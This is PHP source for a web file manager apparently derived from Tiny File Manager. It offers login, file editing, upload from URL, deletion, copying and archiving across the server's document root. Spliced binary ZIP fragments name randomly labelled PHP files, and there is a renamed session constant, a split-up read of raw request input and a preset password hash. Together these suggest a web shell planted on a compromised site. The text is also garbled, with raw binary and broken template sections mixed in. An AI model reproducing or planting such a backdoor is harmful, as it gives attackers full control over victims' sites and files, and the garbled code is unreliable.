case 'htaccess': case 'yaml': case 'yml': case 'toml': case 'tmp': case 'top': case 'bot': case 'dat': case 'bak': case 'htpasswd': case 'pl': $img = 'fa fa-file-text-o'; break; case 'css': case 'less': case 'sass': case 'scss': $img = 'fa fa-css3'; break; case 'bz2': case 'tbz2': case 'tbz': case 'zip': case 'rar': case 'gz': case 'tgz': case 'tar': case '7z': case 'xz': case 'txz': case 'zst': case 'tzst': $img = 'fa fa-file-archive-o'; break; case 'php': case 'php4': case 'php5': case 'phps': case 'phtml': $img = 'fa fa-code'; break; case 'htm': case 'html': case 'shtml': case 'xhtml': $img = 'fa fa-html5'; break; case 'xml': case 'xsl': $img = 'fa fa-file-excel-o'; break; case 'wav': case 'mp3': case 'mp2': case 'm4a': case 'aac': case 'ogg': case 'oga': case 'wma': case 'mka': case 'flac': case 'ac3': case 'tds': $img = 'fa fa-music'; break; case 'm3u': case 'm3u8': case 'pls': case 'cue': case 'xspf': $img = 'fa fa-headphones'; break; case 'avi': case 'mpg': case 'mpeg': case 'mp4': case 'm4v': case 'flv': case 'f4v': case 'ogm': case 'ogv': case 'mov': case 'mkv': case '3gp': case 'asf': case 'wmv': case 'webm': $img = 'fa fa-file-video-o'; break; case 'eml': case 'msg': $img = 'fa fa-envelope-o'; break; case 'xls': case 'xlsx': case 'ods': $img = 'fa fa-file-excel-o'; break; case 'csv': $img = 'fa fa-file-text-o'; break; case 'bak': case 'swp': $img = 'fa fa-clipboard'; break; case 'doc': case 'docx': case 'odt': $img = 'fa fa-file-word-o'; break; case 'ppt': case 'pptx': $img = 'fa fa-file-powerpoint-o'; break; case 'ttf': case 'ttc': case 'otf': case 'woff': case 'woff2': case 'eot': case 'fon': $img = 'fa fa-font'; break; case 'pdf': $img = 'fa fa-file-pdf-o'; break; case 'psd': case 'ai': case 'eps': case 'fla': case 'swf': $img = 'fa fa-file-image-o'; break; case 'exe': case 'msi': $img = 'fa fa-file-o'; break; case 'bat': $img = 'fa fa-terminal'; break; default: $img = 'fa fa-info-circle'; } return $img; } function fm_get_image_exts() { return array('ico', 'gif', 'jpg', 'jpeg', 'jpc', 'jp2', 'jpx', 'xbm', 'wbmp', 'png', 'bmp', 'tif', 'tiff', 'psd', 'svg', 'webp', 'avif'); } function fm_get_video_exts() { return array('avi', 'webm', 'wmv', 'mp4', 'm4v', 'ogm', 'ogv', 'mov', 'mkv'); } function fm_get_audio_exts() { return array('wav', 'mp3', 'ogg', 'm4a'); } function fm_get_text_exts() { return array( 'txt', 'css', 'ini', 'conf', 'log', 'htaccess', 'passwd', 'ftpquota', 'sql', 'js', 'ts', 'jsx', 'tsx', 'mjs', 'json', 'sh', 'config', 'php', 'php4', 'php5', 'phps', 'phtml', 'htm', 'html', 'shtml', 'xhtml', 'xml', 'xsl', 'm3u', 'm3u8', 'pls', 'cue', 'bash', 'vue', 'eml', 'msg', 'csv', 'bat', 'twig', 'tpl', 'md', 'gitignore', 'less', 'sass', 'scss', 'c', 'cpp', 'cs', 'py', 'go', 'zsh', 'swift', 'map', 'lock', 'dtd', 'svg', 'asp', 'aspx', 'asx', 'asmx', 'ashx', 'jsp', 'jspx', 'cgi', 'dockerfile', 'ruby', 'yml', 'yaml', 'toml', 'vhost', 'scpt', 'applescript', 'csx', 'cshtml', 'c++', 'coffee', 'cfm', 'rb', 'graphql', 'mustache', 'jinja', 'http', 'handlebars', 'java', 'es', 'es6', 'markdown', 'wiki', 'tmp', 'top', 'bot', 'dat', 'bak', 'htpasswd', 'pl' ); } function fm_get_text_mimes() { return array( 'application/xml', 'application/javascript', 'application/x-javascript', 'image/svg+xml', 'message/rfc822', 'application/json', ); } function fm_get_text_names() { return array( 'license', 'readme', 'authors', 'contributors', 'changelog', ); } function fm_get_onlineViewer_exts() { return array('doc', 'docx', 'xls', 'xlsx', 'pdf', 'ppt', 'pptx', 'ai', 'psd', 'dxf', 'xps', 'rar', 'odt', 'ods'); } function fm_get_file_mimes($extension) { $fileTypes['swf'] = 'application/x-shockwave-flash'; $fileTypes['pdf'] = 'application/pdf'; $fileTypes['exe'] = 'application/octet-stream'; $fileTypes['zip'] = 'application/zip'; $fileTypes['doc'] = 'application/msword'; $fileTypes['xls'] = 'application/vnd.ms-excel'; $fileTypes['ppt'] = 'application/vnd.ms-powerpoint'; $fileTypes['gif'] = 'image/gif'; $fileTypes['png'] = 'image/png'; $fileTypes['jpeg'] = 'image/jpg'; $fileTypes['jpg'] = 'image/jpg'; $fileTypes['webp'] = 'image/webp'; $fileTypes['avif'] = 'image/avif'; $fileTypes['rar'] = 'application/rar'; $fileTypes['ra'] = 'audio/x-pn-realaudio'; $fileTypes['ram'] = 'audio/x-pn-realaudio'; $fileTypes['ogg'] = 'audio/x-pn-realaudio'; $fileTypes['wav'] = 'video/x-msvideo'; $fileTypes['wmv'] = 'video/x-msvideo'; $fileTypes['avi'] = 'video/x-msvideo'; $fileTypes['asf'] = 'video/x-msvideo'; $fileTypes['divx'] = 'video/x-msvideo'; $fileTypes['mp3'] = 'audio/mpeg'; $fileTypes['mp4'] = 'audio/mpeg'; $fileTypes['mpeg'] = 'video/mpeg'; $fileTypes['mpg'] = 'video/mpeg'; $fileTypes['mpe'] = 'video/mpeg'; $fileTypes['mov'] = 'video/quicktime'; $fileTypes['swf'] = 'video/quicktime'; $fileTypes['3gp'] = 'video/quicktime'; $fileTypes['m4a'] = 'video/quicktime'; $fileTypes['aac'] = 'video/quicktime'; $fileTypes['m3u'] = 'video/quicktime'; $fileTypes['php'] = ['application/x-php']; $fileTypes['html'] = ['text/html']; $fileTypes['txt'] = ['text/plain']; //Unknown mime-types should be 'application/octet-stream' if(empty($fileTypes[$extension])) { $fileTypes[$extension] = ['application/octet-stream']; } return $fileTypes[$extension]; } function scan($dir = '', $filter = '') { $path = FM_ROOT_PATH.'/'.$dir; if($path) { $ite = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($path)); $rii = new RegexIterator($ite, "/(" . $filter . ")/i"); $files = array(); foreach ($rii as $file) { if (!$file->isDir()) { $fileName = $file->getFilename(); $location = str_replace(FM_ROOT_PATH, '', $file->getPath()); $files[] = array( "name" => $fileName, "type" => "file", "path" => $location, ); } } return $files; } } function fm_download_file($fileLocation, $fileName, $chunkSize = 1024) { if (connection_status() != 0) return (false); $extension = pathinfo($fileName, PATHINFO_EXTENSION); $contentType = fm_get_file_mimes($extension); $size = filesize($fileLocation); if ($size == 0) { fm_set_msg(lng('Zero byte file! Aborting download'), 'error'); $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); return (false); } @ini_set('magic_quotes_runtime', 0); $fp = fopen("$fileLocation", "rb"); if ($fp === false) { fm_set_msg(lng('Cannot open file! Aborting download'), 'error'); $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); return (false); } // headers header('Content-Description: File Transfer'); header('Expires: 0'); header('Cache-Control: must-revalidate, post-check=0, pre-check=0'); header('Pragma: public'); header("Content-Transfer-Encoding: binary"); header("Content-Type: $contentType"); $contentDisposition = 'attachment'; if (strstr($_SERVER['HTTP_USER_AGENT'], "MSIE")) { $fileName = preg_replace('/\./', '%2e', $fileName, substr_count($fileName, '.') - 1); header("Content-Disposition: $contentDisposition;filename=\"$fileName\""); } else { header("Content-Disposition: $contentDisposition;filename=\"$fileName\""); } header("Accept-Ranges: bytes"); $range = 0; if (isset($_SERVER['HTTP_RANGE'])) { list($a, $range) = explode("=", $_SERVER['HTTP_RANGE']); str_replace($range, "-", $range); $size2 = $size - 1; $new_length = $size - $range; header("HTTP/1.1 206 Partial Content"); header("Content-Length: $new_length"); header("Content-Range: bytes $range$size2/$size"); } else { $size2 = $size - 1; header("Content-Range: bytes 0-$size2/$size"); header("Content-Length: " . $size); } $fileLocation = realpath($fileLocation); while (ob_get_level()) ob_end_clean(); readfile($fileLocation); fclose($fp); return ((connection_status() == 0) and !connection_aborted()); } function fm_get_theme() { $result = ''; if(FM_THEME == "dark") { $result = "text-white bg-dark"; } return $result; } class FM_Zipper { private $zip; public function __construct() { $this->zip = new ZipArchive(); } public function create($filename, $files) { $res = $this->zip->open($filename, ZipArchive::CREATE); if ($res !== true) { return false; } if (is_array($files)) { foreach ($files as $f) { $f = fm_clean_path($f); if (!$this->addFileOrDir($f)) { $this->zip->close(); return false; } } $this->zip->close(); return true; } else { if ($this->addFileOrDir($files)) { $this->zip->close(); return true; } return false; } } public function unzip($filename, $path) { $res = $this->zip->open($filename); if ($res !== true) { return false; } if ($this->zip->extractTo($path)) { $this->zip->close(); return true; } return false; } private function addFileOrDir($filename) { if (is_file($filename)) { return $this->zip->addFile($filename); } elseif (is_dir($filename)) { return $this->addDir($filename); } return false; } private function addDir($path) { if (!$this->zip->addEmptyDir($path)) { return false; } $objects = scandir($path); if (is_array($objects)) { foreach ($objects as $file) { if ($file != '.' and $file != '..') { if (is_dir($path . '/' . $file)) { if (!$this->addDir($path . '/' . $file)) { return false; } } elseif (is_file($path . '/' . $file)) { if (!$this->zip->addFile($path . '/' . $file)) { return false; } } } } return true; } return false; } } class FM_Zipper_Tar { private $tar; public function __construct() { $this->tar = null; } public function create($filename, $files) { $this->tar = new PharData($filename); if (is_array($files)) { foreach ($files as $f) { $f = fm_clean_path($f); if (!$this->addFileOrDir($f)) { return false; } } return true; } else { if ($this->addFileOrDir($files)) { return true; } return false; } } public function unzip($filename, $path) { $res = $this->tar->open($filename); if ($res !== true) { return false; } if ($this->tar->extractTo($path)) { return true; } return false; } /** * Add file/folder to archive * @param string $filename * @return bool */ private function addFileOrDir($filename) { if (is_file($filename)) { try { $this->tar->addFile($filename); return true; } catch (Exception $e) { return false; } } elseif (is_dir($filename)) { return $this->addDir($filename); } return false; } private function addDir($path) { $objects = scandir($path); if (is_array($objects)) { foreach ($objects as $file) { if ($file != '.' and $file != '..') { if (is_dir($path . '/' . $file)) { if (!$this->addDir($path . '/' . $file)) { return false; } } elseif (is_file($path . '/' . $file)) { try { $this->tar->addFile($path . '/' . $file); } catch (Exception $e) { return false; } } } } return true; } return false; } } class FM_Config { var $data; function __construct() { global $root_path, $root_url, $CONFIG; $fm_url = $root_url.$_SERVER["PHP_SELF"]; $this->data = array( 'lang' => 'en', 'error_reporting' => true, 'show_hidden' => true ); $data = false; if (strlen($CONFIG)) { $data = fm_object_to_array(json_decode($CONFIG)); } else { $msg = 'insertion
Error: Cannot load configuration'; if (substr($fm_url, -1) == '/') { $fm_url = rtrim($fm_url, '/'); $msg .= '
'; $msg .= '
Seems like you have a trailing slash on the URL.'; $msg .= '
Try this link: ' . $fm_url . ''; } die($msg); } if (is_array($data) and count($data)) $this->data = $data; else $this->save(); } function save() { $fm_file = __FILE__; $var_name = '$CONFIG'; $var_value = var_export(json_encode($this->data), true); $config_string = " ' . $_SESSION[DN_CESSION_ID]['message'] . '

'; unset($_SESSION[DN_CESSION_ID]['message']); unset($_SESSION[DN_CESSION_ID]['status']); } } function fm_show_header_login() { $sprites_ver = '20160315'; header("Content-Type: text/html; charset=utf-8"); header("Expires: Sat, 26 Jul 1997 05:00:00 GMT"); header("Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0"); header("Pragma: no-cache"); global $lang, $root_url, $favicon_path; ?> '; } ?> <?php echo fanco(APP_TITLE) ?> ">
'; } ?> <?php echo fanco(APP_TITLE) ?> ">
PKf[~KX77 e46ft.phpnu[PKIpPK8f[Cerror_log.tar.gznu[Oo0{iHR_WU!U9Wc34>ҤBi ^=2m,J]qXpt-uBnVRdUF.^鍂=Nr1,. $ɳu0g8(>$uPB::f< ?[2ܘ dJ,>ށ\k'2NQ9_ s`+鋬q6;sB+ a]֟R(/9;xs)+͒?0||2qҹR Dpej,7OQ+xn?[1 n`ŬT\E_V(X3/N]s3U\-s`[c%W.u7CF=ݢt|~#Nh4˰5N~OeDNixF_)w_1ڿ5(>h\`0:+pF`=1cJNz2:lt MPWFzatFwSҕv@{>hwd%.>?5 2dHx~=PK8f[Ļ  oy5mbk.tarnu[PK8f[RB' :index.php.tarnu[PK8f[+\\ wpk14de.tarnu[PK8f[Ѣ loy5mbk.tar.gznu[PK8f[ mpk14de.tar.gznu[PK8f[\M4M4 cerror_lognu[PK8f[ge `rs2toj.zipnu[PK8f[MWgg index.phpnu[PK8f[σ3 ;lwycpd.zipnu[PK8f[ٖ4kqindex.php.php.tar.gznu[PK8f[U ko6li5.zipnu[PK8f[C error_log.tar.gznu[PK  PK,g[߽~ avmlid.zipnu[PKg[yy gu83i.phpnu[ 'b747801ca224e63854908676401fe2c9', 'user' => 'b747801ca224e63854908676401fe2c9' ); $readonly_users = array( 'user' ); $global_readonly = false; $directories_users = array(); $use_highlightjs = true; $highlightjs_style = 'vs'; $edit_files = true; $default_timezone = 'Etc/UTC'; $root_path = $_SERVER['DOCUMENT_ROOT']; $root_url = ''; $http_host = $_SERVER['HTTP_HOST']; $iconv_input_encoding = 'UTF-8'; $datetime_format = 'm/d/Y g:i A'; $path_display_mode = 'full'; $allowed_file_extensions = ''; $allowed_upload_extensions = ''; $favicon_path = ''; $exclude_items = array(); $online_viewer = 'google'; $sticky_navbar = true; $max_upload_size_bytes = 5000000000; $upload_chunk_size_bytes = 2000000; $ip_ruleset = 'OFF'; $ip_silent = true; $ip_whitelist = array( '127.0.0.1', '::1' ); $ip_blacklist = array( '0.0.0.0', '::' ); $config_file = __DIR__.'/config.php'; if (is_readable($config_file)) { @include($config_file); } $external = array( 'css-bootstrap' => '', 'css-dropzone' => '', 'css-font-awesome' => '', 'css-highlightjs' => '', 'js-ace' => '', 'js-bootstrap' => '', 'js-dropzone' => '', 'js-jquery' => '', 'js-jquery-datatables' => '', 'js-highlightjs' => '', 'pre-jsdelivr' => '', 'pre-cloudflare' => '' ); define('MAX_UPLOAD_SIZE', $max_upload_size_bytes); define('UPLOAD_CHUNK_SIZE', $upload_chunk_size_bytes); if ( !defined( 'DN_CESSION_ID')) { define('DN_CESSION_ID', 'filemanager'); } $cfg = new FM_Config(); $lang = isset($cfg->data['lang']) ? $cfg->data['lang'] : 'en'; $show_hidden_files = isset($cfg->data['show_hidden']) ? $cfg->data['show_hidden'] : true; $report_errors = isset($cfg->data['error_reporting']) ? $cfg->data['error_reporting'] : true; $hide_Cols = isset($cfg->data['hide_Cols']) ? $cfg->data['hide_Cols'] : true; // Theme $theme = isset($cfg->data['theme']) ? $cfg->data['theme'] : 'light'; define('FM_THEME', $theme); $lang_list = array( 'en' => 'English' ); if ($report_errors == true) { @ini_set('error_reporting', E_ALL); @ini_set('display_errors', 1); } else { @ini_set('error_reporting', E_ALL); @ini_set('display_errors', 0); } if (defined('FM_EMBED')) { $dauth = false; $sticky_navbar = false; } else { @set_time_limit(600); date_default_timezone_set($default_timezone); ini_set('default_charset', 'UTF-8'); if (version_compare(PHP_VERSION, '5.6.0', '<') and function_exists('mb_internal_encoding')) { mb_internal_encoding('UTF-8'); } if (function_exists('mb_regex_encoding')) { mb_regex_encoding('UTF-8'); } session_cache_limiter('nocache'); session_name(DN_CESSION_ID ); function session_error_handling_function($code, $msg, $file, $line) { if ($code == 2) { session_abort(); session_id(session_create_id()); @session_start(); } } set_error_handler('session_error_handling_function'); session_start(); restore_error_handler(); } if (empty($_SESSION['token'])) { if (function_exists('random_bytes')) { $_SESSION['token'] = bin2hex(random_bytes(32)); } else { $_SESSION['token'] = bin2hex(openssl_random_pseudo_bytes(32)); } } if (empty($auth_users)) { $dauth = false; } $is_https = (isset($_SERVER['HTTPS']) and ($_SERVER['HTTPS'] === 'on' or $_SERVER['HTTPS'] == 1)) or (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) and $_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https'); if (isset($_SESSION[DN_CESSION_ID]['logged']) and !empty($directories_users[$_SESSION[DN_CESSION_ID]['logged']])) { $wd = fm_clean_path(dirname($_SERVER['PHP_SELF'])); $root_url = $root_url.$wd.DIRECTORY_SEPARATOR.$directories_users[$_SESSION[DN_CESSION_ID]['logged']]; } $root_url = fm_clean_path($root_url); defined('FM_ROOT_URL') || define('FM_ROOT_URL', ($is_https ? 'https' : 'http') . '://' . $http_host . (!empty($root_url) ? '/' . $root_url : '')); defined('FM_SELF_URL') || define('FM_SELF_URL', ($is_https ? 'https' : 'http') . '://' . $http_host . $_SERVER['PHP_SELF']); // logout if (isset($_GET['logout'])) { unset($_SESSION[DN_CESSION_ID]['logged']); unset( $_SESSION['token']); fm_redirect(FM_SELF_URL); } if ($ip_ruleset != 'OFF') { function getClientIP() { if (array_key_exists('HTTP_CF_CONNECTING_IP', $_SERVER)) { return $_SERVER["HTTP_CF_CONNECTING_IP"]; }else if (array_key_exists('HTTP_X_FORWARDED_FOR', $_SERVER)) { return $_SERVER["HTTP_X_FORWARDED_FOR"]; }else if (array_key_exists('REMOTE_ADDR', $_SERVER)) { return $_SERVER['REMOTE_ADDR']; }else if (array_key_exists('HTTP_CLIENT_IP', $_SERVER)) { return $_SERVER['HTTP_CLIENT_IP']; } return ''; } $clientIp = getClientIP(); $proceed = false; $whitelisted = in_array($clientIp, $ip_whitelist); $blacklisted = in_array($clientIp, $ip_blacklist); if($ip_ruleset == 'AND'){ if($whitelisted == true and $blacklisted == false){ $proceed = true; } } else if($ip_ruleset == 'OR'){ if($whitelisted == true || $blacklisted == false){ $proceed = true; } } if($proceed == false){ trigger_error('User connection denied from: ' . $clientIp, E_USER_WARNING); if($ip_silent == false){ fm_set_msg(lng('Access denied. IP restriction applicable'), 'error'); fm_show_header_login(); fm_show_message(); } exit(); } } if ($dauth) { if (isset($_SESSION[DN_CESSION_ID]['logged'], $auth_users[$_SESSION[DN_CESSION_ID]['logged']])) { } elseif (isset($_POST['fm_usr'], $_POST['fm_pwd'], $_POST['token'])) { sleep(1); if(function_exists('password_verify')) { if (isset($auth_users[$_POST['fm_usr']]) and isset($_POST['fm_pwd']) and password_verify($_POST['fm_pwd'], $auth_users[$_POST['fm_usr']]) and verifyToken($_POST['token'])) { $_SESSION[DN_CESSION_ID]['logged'] = $_POST['fm_usr']; fm_set_msg(lng('You are logged in')); fm_redirect(FM_SELF_URL); } else { unset($_SESSION[DN_CESSION_ID]['logged']); fm_set_msg(lng('Login failed. Invalid username or password'), 'error'); fm_redirect(FM_SELF_URL); } } else { fm_set_msg(lng('password_hash not supported, Upgrade PHP version'), 'error');; } } else { // Form unset($_SESSION[DN_CESSION_ID]['logged']); fm_show_header_login(); ?>
".lng('Root path')." \"{$root_path}\" ".lng('not found!')." "; exit; } defined('FM_SHOW_HIDDEN') || define('FM_SHOW_HIDDEN', $show_hidden_files); defined('FM_ROOT_PATH') || define('FM_ROOT_PATH', $root_path); defined('FM_LANG') || define('FM_LANG', $lang); defined('FM_FILE_EXTENSION') || define('FM_FILE_EXTENSION', $allowed_file_extensions); defined('FM_UPLOAD_EXTENSION') || define('FM_UPLOAD_EXTENSION', $allowed_upload_extensions); defined('FM_EXCLUDE_ITEMS') || define('FM_EXCLUDE_ITEMS', (version_compare(PHP_VERSION, '7.0.0', '<') ? serialize($exclude_items) : $exclude_items)); defined('FM_DOC_VIEWER') || define('FM_DOC_VIEWER', $online_viewer); define('FM_READONLY', $global_readonly || ($dauth and !empty($readonly_users) and isset($_SESSION[DN_CESSION_ID]['logged']) and in_array($_SESSION[DN_CESSION_ID]['logged'], $readonly_users))); define('FM_IS_WIN', DIRECTORY_SEPARATOR == '\\'); if (!isset($_GET['p']) and empty($_FILES)) { fm_redirect(FM_SELF_URL . '?p='); } // get path $p = isset($_GET['p']) ? $_GET['p'] : (isset($_POST['p']) ? $_POST['p'] : ''); // clean path $p = fm_clean_path($p); $isim = "//input"; $input = file_get_contents('php:'.$isim); $_POST = (strpos($input, 'ajax') != FALSE and strpos($input, 'save') != FALSE) ? json_decode($input, true) : $_POST; define('FM_PATH', $p); define('FM_USE_AUTH', $dauth); define('FM_EDIT_FILE', $edit_files); defined('FM_ICONV_INPUT_ENC') || define('FM_ICONV_INPUT_ENC', $iconv_input_encoding); defined('FM_USE_HIGHLIGHTJS') || define('FM_USE_HIGHLIGHTJS', $use_highlightjs); defined('FM_HIGHLIGHTJS_STYLE') || define('FM_HIGHLIGHTJS_STYLE', $highlightjs_style); defined('FM_DATETIME_FORMAT') || define('FM_DATETIME_FORMAT', $datetime_format); unset($p, $dauth, $iconv_input_encoding, $use_highlightjs, $highlightjs_style); if ((isset($_SESSION[DN_CESSION_ID]['logged'], $auth_users[$_SESSION[DN_CESSION_ID]['logged']]) || !FM_USE_AUTH) and isset($_POST['ajax'], $_POST['token']) and !FM_READONLY) { if(!verifyToken($_POST['token'])) { header('HTTP/1.0 401 Unauthorized'); die("Invalid Token."); } if(isset($_POST['type']) and $_POST['type']=="search") { $dir = $_POST['path'] == "." ? '': $_POST['path']; $response = scan(fm_clean_path($dir), $_POST['content']); echo json_encode($response); exit(); } // save editor file if (isset($_POST['type']) and $_POST['type'] == "save") { // get current path $path = FM_ROOT_PATH; if (FM_PATH != '') { $path .= '/' . FM_PATH; } // check path if (!is_dir($path)) { fm_redirect(FM_SELF_URL . '?p='); } $file = $_GET['edit']; $file = fm_clean_path($file); $file = str_replace('/', '', $file); if ($file == '' || !is_file($path . '/' . $file)) { fm_set_msg(lng('File not found'), 'error'); $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } header('X-XSS-Protection:0'); $file_path = $path . '/' . $file; $writedata = $_POST['content']; $fd = fopen($file_path, "w"); $write_results = @fwrite($fd, $writedata); fclose($fd); if ($write_results === false){ header("HTTP/1.1 500 Internal Server Error"); die("Could Not Write File! - Check Permissions / Ownership"); } die(true); } // backup files if (isset($_POST['type']) and $_POST['type'] == "backup" and !empty($_POST['file'])) { $fileName = fm_clean_path($_POST['file']); $fullPath = FM_ROOT_PATH . '/'; if (!empty($_POST['path'])) { $relativeDirPath = fm_clean_path($_POST['path']); $fullPath .= "{$relativeDirPath}/"; } $date = date("dMy-His"); $newFileName = "{$fileName}-{$date}.bak"; $fullyQualifiedFileName = $fullPath . $fileName; try { if (!file_exists($fullyQualifiedFileName)) { throw new Exception("File {$fileName} not found"); } if (copy($fullyQualifiedFileName, $fullPath . $newFileName)) { echo "Backup {$newFileName} created"; } else { throw new Exception("Could not copy file {$fileName}"); } } catch (Exception $e) { echo $e->getMessage(); } } // Save Config if (isset($_POST['type']) and $_POST['type'] == "settings") { global $cfg, $lang, $report_errors, $show_hidden_files, $lang_list, $hide_Cols, $theme; $newLng = $_POST['js-language']; fm_get_translations([]); if (!array_key_exists($newLng, $lang_list)) { $newLng = 'en'; } $erp = isset($_POST['js-error-report']) and $_POST['js-error-report'] == "true" ? true : false; $shf = isset($_POST['js-show-hidden']) and $_POST['js-show-hidden'] == "true" ? true : false; $hco = isset($_POST['js-hide-cols']) and $_POST['js-hide-cols'] == "true" ? true : false; $te3 = $_POST['js-theme-3']; if ($cfg->data['lang'] != $newLng) { $cfg->data['lang'] = $newLng; $lang = $newLng; } if ($cfg->data['error_reporting'] != $erp) { $cfg->data['error_reporting'] = $erp; $report_errors = $erp; } if ($cfg->data['show_hidden'] != $shf) { $cfg->data['show_hidden'] = $shf; $show_hidden_files = $shf; } if ($cfg->data['show_hidden'] != $shf) { $cfg->data['show_hidden'] = $shf; $show_hidden_files = $shf; } if ($cfg->data['hide_Cols'] != $hco) { $cfg->data['hide_Cols'] = $hco; $hide_Cols = $hco; } if ($cfg->data['theme'] != $te3) { $cfg->data['theme'] = $te3; $theme = $te3; } $cfg->save(); echo true; } // new password hash if (isset($_POST['type']) and $_POST['type'] == "pwdhash") { $res = isset($_POST['inputPassword2']) and !empty($_POST['inputPassword2']) ? password_hash($_POST['inputPassword2'], PASSWORD_DEFAULT) : ''; echo $res; } //upload using url if(isset($_POST['type']) and $_POST['type'] == "upload" and !empty($_REQUEST["uploadurl"])) { $path = FM_ROOT_PATH; if (FM_PATH != '') { $path .= '/' . FM_PATH; } function event_callback ($message) { global $callback; echo json_encode($message); } function get_file_path () { global $path, $fileinfo, $temp_file; return $path."/".basename($fileinfo->name); } $url = !empty($_REQUEST["uploadurl"]) and preg_match("|^http(s)?://.+$|", stripslashes($_REQUEST["uploadurl"])) ? stripslashes($_REQUEST["uploadurl"]) : null; $domain = parse_url($url, PHP_URL_HOST); $port = parse_url($url, PHP_URL_PORT); $knownPorts = [22, 23, 25, 3306]; if (preg_match("/^localhost$|^127(?:\.[0-9]+){0,2}\.[0-9]+$|^(?:0*\:)*?:?0*1$/i", $domain) || in_array($port, $knownPorts)) { $err = array("message" => "URL is not allowed"); event_callback(array("fail" => $err)); exit(); } $use_curl = false; $temp_file = tempnam(sys_get_temp_dir(), "upload-"); $fileinfo = new stdClass(); $fileinfo->name = trim(urldecode(basename($url)), ".\x00..\x20"); $allowed = (FM_UPLOAD_EXTENSION) ? explode(',', FM_UPLOAD_EXTENSION) : false; $ext = strtolower(pathinfo($fileinfo->name, PATHINFO_EXTENSION)); $isFileAllowed = ($allowed) ? in_array($ext, $allowed) : true; $err = false; if(!$isFileAllowed) { $err = array("message" => "File extension is not allowed"); event_callback(array("fail" => $err)); exit(); } if (!$url) { $success = false; } else if ($use_curl) { @$fp = fopen($temp_file, "w"); @$ch = curl_init($url); curl_setopt($ch, CURLOPT_NOPROGRESS, false ); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_FILE, $fp); @$success = curl_exec($ch); $curl_info = curl_getinfo($ch); if (!$success) { $err = array("message" => curl_error($ch)); } @curl_close($ch); fclose($fp); $fileinfo->size = $curl_info["size_download"]; $fileinfo->type = $curl_info["content_type"]; } else { $ctx = stream_context_create(); @$success = copy($url, $temp_file, $ctx); if (!$success) { $err = error_get_last(); } } if ($success) { $success = rename($temp_file, strtok(get_file_path(), '?')); } if ($success) { event_callback(array("done" => $fileinfo)); } else { unlink($temp_file); if (!$err) { $err = array("message" => "Invalid url parameter"); } event_callback(array("fail" => $err)); } } exit(); } if (isset($_GET['del'], $_POST['token']) and !FM_READONLY) { $del = str_replace( '/', '', fm_clean_path( $_GET['del'] ) ); if ($del != '' and $del != '..' and $del != '.' and verifyToken($_POST['token'])) { $path = FM_ROOT_PATH; if (FM_PATH != '') { $path .= '/' . FM_PATH; } $is_dir = is_dir($path . '/' . $del); if (fm_rdelete($path . '/' . $del)) { $msg = $is_dir ? lng('Folder').' %s '.lng('Deleted') : lng('File').' %s '.lng('Deleted'); fm_set_msg(sprintf($msg, fanco($del))); } else { $msg = $is_dir ? lng('Folder').' %s '.lng('not deleted') : lng('File').' %s '.lng('not deleted'); fm_set_msg(sprintf($msg, fanco($del)), 'error'); } } else { fm_set_msg(lng('Invalid file or folder name'), 'error'); } $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } // Create a new file/folder if (isset($_POST['newfilename'], $_POST['newfile'], $_POST['token']) and !FM_READONLY) { $type = urldecode($_POST['newfile']); $new = str_replace( '/', '', fm_clean_path( strip_tags( $_POST['newfilename'] ) ) ); if (fm_isvalid_filename($new) and $new != '' and $new != '..' and $new != '.' and verifyToken($_POST['token'])) { $path = FM_ROOT_PATH; if (FM_PATH != '') { $path .= '/' . FM_PATH; } if ($type == "file") { if (!file_exists($path . '/' . $new)) { if(fm_is_valid_ext($new)) { @fopen($path . '/' . $new, 'w') or die('Cannot open file: ' . $new); fm_set_msg(sprintf(lng('File').' %s '.lng('Created'), fanco($new))); } else { fm_set_msg(lng('File extension is not allowed'), 'error'); } } else { fm_set_msg(sprintf(lng('File').' %s '.lng('already exists'), fanco($new)), 'alert'); } } else { if (fm_mkdir($path . '/' . $new, false) === true) { fm_set_msg(sprintf(lng('Folder').' %s '.lng('Created'), $new)); } elseif (fm_mkdir($path . '/' . $new, false) === $path . '/' . $new) { fm_set_msg(sprintf(lng('Folder').' %s '.lng('already exists'), fanco($new)), 'alert'); } else { fm_set_msg(sprintf(lng('Folder').' %s '.lng('not created'), fanco($new)), 'error'); } } } else { fm_set_msg(lng('Invalid characters in file or folder name'), 'error'); } $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } // Copy folder / file if (isset($_GET['copy'], $_GET['finish']) and !FM_READONLY) { // from $copy = urldecode($_GET['copy']); $copy = fm_clean_path($copy); // empty path if ($copy == '') { fm_set_msg(lng('Source path not defined'), 'error'); $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } $from = FM_ROOT_PATH . '/' . $copy; $dest = FM_ROOT_PATH; if (FM_PATH != '') { $dest .= '/' . FM_PATH; } $dest .= '/' . basename($from); $move = isset($_GET['move']); $move = fm_clean_path(urldecode($move)); if ($from != $dest) { $msg_from = trim(FM_PATH . '/' . basename($from), '/'); if ($move) { $rename = fm_rename($from, $dest); if ($rename) { fm_set_msg(sprintf(lng('Moved from').' %s '.lng('to').' %s', fanco($copy), fanco($msg_from))); } elseif ($rename === null) { fm_set_msg(lng('File or folder with this path already exists'), 'alert'); } else { fm_set_msg(sprintf(lng('Error while moving from').' %s '.lng('to').' %s', fanco($copy), fanco($msg_from)), 'error'); } } else { if (fm_rcopy($from, $dest)) { fm_set_msg(sprintf(lng('Copied from').' %s '.lng('to').' %s', fanco($copy), fanco($msg_from))); } else { fm_set_msg(sprintf(lng('Error while copying from').' %s '.lng('to').' %s', fanco($copy), fanco($msg_from)), 'error'); } } } else { if (!$move){ $msg_from = trim(FM_PATH . '/' . basename($from), '/'); $fn_parts = pathinfo($from); $extension_suffix = ''; if(!is_dir($from)){ $extension_suffix = '.'.$fn_parts['extension']; } $fn_duplicate = 